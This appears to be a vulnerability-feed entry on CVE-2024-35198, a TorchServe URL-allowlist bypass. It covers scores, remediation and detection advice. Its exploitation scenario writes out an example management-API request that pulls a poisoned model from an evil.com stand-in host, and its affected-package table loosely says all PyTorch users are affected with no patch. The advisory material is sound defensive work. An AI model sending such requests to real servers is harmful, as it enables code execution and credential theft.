AI Threat Alert

CVE-2024-35198: TorchServe: URL bypass enables arbitrary model loading

CRITICAL PoC AVAILABLE
Published July 19, 2024
CISO Take

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

What is the risk?

Critical. CVSS 9.8 with no authentication, no user interaction, and network-accessible attack vector makes this trivially exploitable from the internet. The bypass is a simple URL manipulation technique requiring no AI/ML knowledge. TorchServe management APIs are frequently left exposed on internal networks or misconfigured cloud deployments, widening the blast radius. The core risk is not just model substitution but potential RCE through malicious model artifacts.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PyTorch pip No patch
100.9K OpenSSF 6.4 22.7K dependents Pushed 3d ago 11% patched ~216d to patch Full package profile →

Do you use PyTorch? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
0.8%
chance of exploitation in 30 days
Higher than 52% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    Upgrade TorchServe to v0.11.0 or later — this is the only complete fix.

  2. IMMEDIATE WORKAROUND

    Restrict network access to TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only.

  3. AUDIT

    Inspect current model store for unexpected or recently-added models; compare against your approved model registry.

  4. DETECT

    Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E).

  5. HARDEN

    Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Auth Bypass Supply Chain Code Execution Inference Framework AML.T0010.001 AML.T0010.003 AML.T0018.000 AML.T0018.002 AML.T0049

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.1.4 - AI system resource and capability management A.9.3 - AI system integrity
NIST AI RMF
MANAGE 2.2 - Mechanisms to sustain the value of deployed AI
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-35198?

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Is CVE-2024-35198 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-35198, increasing the risk of exploitation.

How to fix CVE-2024-35198?

1. PATCH: Upgrade TorchServe to v0.11.0 or later — this is the only complete fix. 2. IMMEDIATE WORKAROUND: Restrict network access to TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only. 3. AUDIT: Inspect current model store for unexpected or recently-added models; compare against your approved model registry. 4. DETECT: Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E). 5. HARDEN: Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

What systems are affected by CVE-2024-35198?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps pipelines, inference infrastructure, training pipelines.

What is the CVSS score for CVE-2024-35198?

CVE-2024-35198 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.79%.

What is the AI security impact?

Affected AI Architectures

model servingMLOps pipelinesinference infrastructuretraining pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.003 Model
AML.T0018.000 Poison AI Model
AML.T0018.002 Embed Malware
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.1.4, A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

TorchServe is a flexible and easy-to-use tool for serving and scaling PyTorch models in production. TorchServe 's check on allowed_urls configuration can be by-passed if the URL contains characters such as ".." but it does not prevent the model from being downloaded into the model store. Once a file is downloaded, it can be referenced without providing a URL the second time, which effectively bypasses the allowed_urls security check. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and EKS are not affected. This issue in TorchServe has been fixed by validating the URL without characters such as ".." before downloading see PR #3082. TorchServe release 0.11.0 includes the fix to address this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Exploitation Scenario

An attacker targeting an organization's ML inference infrastructure sends a POST request to TorchServe's management API: 'POST /models?url=https://evil.com/../allowed-partner.com/poisoned_resnet.mar'. The URL validation checks the allowlist against the raw string but does not normalize the path, so 'allowed-partner.com' appears in the URL and passes the check. TorchServe downloads the model from evil.com into the local model store. The attacker then triggers inference via 'POST /predictions/poisoned_resnet' — no URL required this time since the model is cached locally. The malicious MAR file executes arbitrary code during deserialization, establishing persistence or exfiltrating credentials from the ML worker process.

Weaknesses (CWE)

CWE-706 Use of Incorrectly-Resolved Name or Reference

CWE-706 — Use of Incorrectly-Resolved Name or Reference: The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
July 19, 2024
Last Modified
September 4, 2025
First Seen
July 19, 2024

Related Vulnerabilities

CRITICAL CVE-2024-5452 9.8

pytorch-lightning: RCE via deepdiff Delta deserialization

Same package: torch
CRITICAL CVE-2023-43654 9.8

TorchServe: SSRF + RCE via unrestricted model URL loading

Same package: torch
CRITICAL CVE-2022-45907 9.8

PyTorch: RCE via unsafe eval in JIT annotations

Same package: torch
CRITICAL CVE-2022-0845 9.8

pytorch-lightning: code injection enables full RCE

Same package: torch
CRITICAL CVE-2024-48063 9.8

PyTorch: RCE via RemoteModule deserialization

Same package: torch
Back to Threat Feed